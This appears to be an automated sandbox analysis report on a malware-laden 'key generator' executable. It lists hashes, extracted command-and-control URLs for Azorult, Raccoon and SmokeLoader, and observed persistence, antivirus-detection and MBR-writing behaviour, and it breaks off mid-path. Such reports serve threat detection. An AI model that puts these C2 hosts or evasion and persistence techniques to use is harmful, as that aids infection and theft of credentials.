Analysis
-
max time kernel
96s -
max time network
603s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
10-03-2021 05:22
Static task
static1
Behavioral task
behavioral1
Sample
Myob_Accountright_Plus_19_0_key_generator.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Myob_Accountright_Plus_19_0_key_generator.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Myob_Accountright_Plus_19_0_key_generator.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Myob_Accountright_Plus_19_0_key_generator.exe
Resource
win10v20201028
General
-
Target
Myob_Accountright_Plus_19_0_key_generator.exe
-
Size
8.2MB
-
MD5
952996743eb4a668b63ede4dfb4c955a
-
SHA1
d2094fc439aae23d2dd4a3e353867bede987cf8d
-
SHA256
ac0fd3d8f29a9ba792cc7e9f6aa6f077354ebccbd3e68cfa81cf6dd3e5247f30
-
SHA512
da3b52ec006537fefe96ca3ed103004886c093492e1c2d015a7c69ea52891960d585b6092e62d736ea7166fc93aa2a073c5b10351b032852e825764446710f42
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/6612-498-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/6612-502-0x0000000003910000-0x000000000416D000-memory.dmp family_glupteba behavioral3/memory/6612-505-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral3/memory/3824-186-0x00000000022E0000-0x0000000002308000-memory.dmp family_redline behavioral3/memory/3824-193-0x0000000002600000-0x0000000002626000-memory.dmp family_redline behavioral3/memory/4268-402-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/6488-465-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral3/memory/6428-491-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/7816-665-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/7132-1019-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/6556-1451-0x0000000000400000-0x0000000000426000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 5504 created 3444 5504 WerFault.exe 148 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 15 IoCs
pid Process 1500 bcdedit.exe 7376 bcdedit.exe 8120 bcdedit.exe 7688 bcdedit.exe 7812 bcdedit.exe 7932 bcdedit.exe 1500 bcdedit.exe 7432 bcdedit.exe 7120 bcdedit.exe 7612 bcdedit.exe 7752 bcdedit.exe 7800 bcdedit.exe 640 bcdedit.exe 7240 bcdedit.exe 7808 bcdedit.exe -
Nirsoft 6 IoCs
resource yara_rule behavioral3/files/0x0004000000015603-54.dat Nirsoft behavioral3/files/0x0004000000015603-55.dat Nirsoft behavioral3/files/0x000100000001abac-78.dat Nirsoft behavioral3/files/0x000100000001abac-77.dat Nirsoft behavioral3/files/0x000100000001abc2-112.dat Nirsoft behavioral3/files/0x000100000001abc2-111.dat Nirsoft -
Blocklisted process makes network request 15 IoCs
flow pid Process 124 4208 powershell.exe 125 3300 powershell.exe 218 6800 cmd.exe 219 6800 cmd.exe 221 6800 cmd.exe 222 6800 cmd.exe 224 6800 cmd.exe 124 4208 powershell.exe 125 3300 powershell.exe 221 6800 cmd.exe 218 6800 cmd.exe 219 6800 cmd.exe 221 6800 cmd.exe 222 6800 cmd.exe 224 6800 cmd.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\SETB816.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETB816.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 836 keygen-pr.exe 928 keygen-step-1.exe 1048 keygen-step-3.exe 1172 keygen-step-4.exe 4076 key.exe 2064 Setup.exe 184 AD754B4D3FE2C4EE.exe 212 AD754B4D3FE2C4EE.exe 2844 askinstall20.exe 3716 1615354024190.exe 1564 Install.exe 1176 multitimer.exe 2548 md2_2efs.exe 2924 1615354028456.exe 4632 file.exe 4460 E93D.tmp.exe 3340 multitimer.exe 3536 EA18.tmp.exe 3708 1615354033690.exe 4320 multitimer.exe 1812 E93D.tmp.exe 2560 wxqhvcpn0bf.exe 2596 wxqhvcpn0bf.tmp 1316 id1v20wqnjd.exe 2184 chashepro3.exe 1008 askinstall24.exe 704 tbf5e3oskok.exe 2304 vpn.exe 3120 IBInstaller_97039.exe 5096 chashepro3.tmp 4488 vpn.tmp 2280 Setup3310.exe 4544 IBInstaller_97039.tmp 4472 Setup3310.tmp 3824 Brava.exe 1504 Venita.exe 4688 mex.exe 3444 igfzl2wj0pz.exe 4712 chrome_proxy.exe 2712 BTRSetp.exe 3616 app.exe 1332 winlthst.exe 5464 6756324.74 5492 6943189.76 5512 3402114.37 5548 5628588.61 5568 ThunderFW.exe 5624 gcttt.exe 5828 jobyfr3bzz5.exe 5932 jobyfr3bzz5.tmp 1340 H24OL7I1T.exe 2580 Setup.exe 220 Setup.tmp 4896 jfiag3g_gg.exe 4964 Windows Host.exe 5264 EA18.tmp.exe 4268 EA18.tmp.exe 4796 jfiag3g_gg.exe 5732 tapinstall.exe 2120 MiniThunderPlatform.exe 2592 7za.exe 5168 app.exe 6184 Messure.exe 6204 7za.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral3/files/0x000100000001ab81-28.dat office_xlm_macros -
resource yara_rule behavioral3/memory/7992-741-0x0000000000400000-0x0000000000897000-memory.dmp upx behavioral3/memory/2092-866-0x0000000000400000-0x0000000000C1B000-memory.dmp upx behavioral3/memory/4920-867-0x0000000000400000-0x00000000005E6000-memory.dmp upx behavioral3/memory/8772-889-0x0000000000400000-0x0000000000C1B000-memory.dmp upx -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 40 IoCs
pid Process 4736 MsiExec.exe 2596 wxqhvcpn0bf.tmp 4488 vpn.tmp 4488 vpn.tmp 4544 IBInstaller_97039.tmp 4472 Setup3310.tmp 4472 Setup3310.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 4488 vpn.tmp 5932 jobyfr3bzz5.tmp 5932 jobyfr3bzz5.tmp 5932 jobyfr3bzz5.tmp 5932 jobyfr3bzz5.tmp 5932 jobyfr3bzz5.tmp 5932 jobyfr3bzz5.tmp 5932 jobyfr3bzz5.tmp 220 Setup.tmp 220 Setup.tmp 3616 app.exe 184 AD754B4D3FE2C4EE.exe 184 AD754B4D3FE2C4EE.exe 2120 MiniThunderPlatform.exe 2120 MiniThunderPlatform.exe 2120 MiniThunderPlatform.exe 2120 MiniThunderPlatform.exe 2120 MiniThunderPlatform.exe 2120 MiniThunderPlatform.exe 2120 MiniThunderPlatform.exe 6232 Messure.tmp 6232 Messure.tmp 6392 mex.exe 6392 mex.exe 6392 mex.exe 6392 mex.exe 6392 mex.exe 6392 mex.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\5236084 = "\"C:\\Users\\Admin\\AppData\\Roaming\\ezgqiwaw4wj\\jobyfr3bzz5.exe\" /VERYSILENT" jobyfr3bzz5.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\7SN2QMMHVS27PIO = "\"C:\\Program Files\\4DY9D8C0UK\\H24OL7I1T.exe\"" H24OL7I1T.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\py2c4v41w53 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SI484NIRL5\\multitimer.exe\" 1 3.1615353818.604857daf0322" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 6943189.76 -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA windefender.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 53 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31088 ipinfo.io 33595 ip-api.com 33667 ipinfo.io 5290 ipinfo.io 15386 ipinfo.io 18044 ipinfo.io 18872 ipinfo.io 31040 ipinfo.io 23298 checkip.amazonaws.com 32751 ip-api.com 1283 ipinfo.io 27821 ipinfo.io 29788 ipinfo.io 33648 ipinfo.io 118 ip-api.com 3815 ipinfo.io 5288 ipinfo.io 10320 checkip.amazonaws.com 29787 ipinfo.io 155 checkip.amazonaws.com 28510 ipinfo.io 95 ipinfo.io 252 ipinfo.io 291 ipinfo.io 16709 ipinfo.io 32508 ipinfo.io 26897 ipinfo.io 191 ipinfo.io 16713 ipinfo.io 28647 ipinfo.io 24673 ipinfo.io 31389 ipinfo.io 408 ip-api.com 5497 ipinfo.io 12255 ipinfo.io 18927 ipinfo.io 7407 ip-api.com 18027 ipinfo.io 23917 ipinfo.io 14677 ipinfo.io 26513 ipinfo.io 714 ipinfo.io 99 ipinfo.io 660 checkip.amazonaws.com 11587 ipinfo.io 288 ipinfo.io 307 ipinfo.io 26289 ipinfo.io 32500 ipinfo.io 63 api.ipify.org 16029 ipinfo.io 18043 ipinfo.io 20277 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\SETB623.tmp Conhost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\tap0901.sys Conhost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat Conhost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf Conhost.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt Conhost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\SETB622.tmp Conhost.exe File created C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\SETB622.tmp Conhost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\oemvista.inf Conhost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\SETB624.tmp Conhost.exe File created C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\SETB624.tmp Conhost.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\tap0901.cat Conhost.exe File created C:\Windows\System32\DriverStore\drvstore.tmp Conhost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys Conhost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160}\SETB623.tmp Conhost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6dd6a966-5327-0844-8539-f735a2b25160} Conhost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2064 Setup.exe 2600 mask_svc.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 184 set thread context of 748 184 AD754B4D3FE2C4EE.exe 103 PID 184 set thread context of 2560 184 AD754B4D3FE2C4EE.exe 114 PID 184 set thread context of 4212 184 AD754B4D3FE2C4EE.exe 120 PID 4460 set thread context of 1812 4460 E93D.tmp.exe 123 PID 3536 set thread context of 4268 3536 EA18.tmp.exe 187 PID 4688 set thread context of 6392 4688 mex.exe 215 PID 1504 set thread context of 6488 1504 Venita.exe 216 PID 5512 set thread context of 6428 5512 3402114.37 229 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\JCleaner\mex.exe chashepro3.tmp File created C:\Program Files (x86)\Silent-Rain\7za.dll app.exe File created C:\Program Files (x86)\viewerise\is-A55LQ.tmp wxqhvcpn0bf.tmp File created C:\Program Files\4DY9D8C0UK\uninstaller.exe tbf5e3oskok.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-AUVLQ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-D37HO.tmp vpn.tmp File created C:\Program Files (x86)\Silent-Rain\7zxa.dll app.exe File created C:\Program Files (x86)\Silent-Rain\NalDrv.sys app.exe File opened for modification C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-9J3GS.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-VFOR8.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat wxqhvcpn0bf.tmp File opened for modification C:\Program Files (x86)\Silent-Rain\WinmonProcessMonitor.sys app.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-35UDD.tmp vpn.tmp File created C:\Program Files\4DY9D8C0UK\cast.config H24OL7I1T.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-6AA7C.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\Silent-Rain\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BNTNA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-30K9Q.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-61HJA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-I0NHQ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-HLBD2.tmp vpn.tmp File created C:\Program Files (x86)\Silent-Rain\WinmonProcessMonitor.sys 7za.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-S0SDT.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-0C29G.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-F0UG0.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-UPE8I.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-64KQA.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-7FFV3.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-UIFAM.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-I1BKB.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-G8N90.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-1GP77.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-DNB41.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-U23IA.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-39H9P.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\JCleaner\is-VC9GH.tmp chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Silent-Rain\app.exe app.exe File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-GH1DQ.tmp vpn.tmp File created C:\Program Files 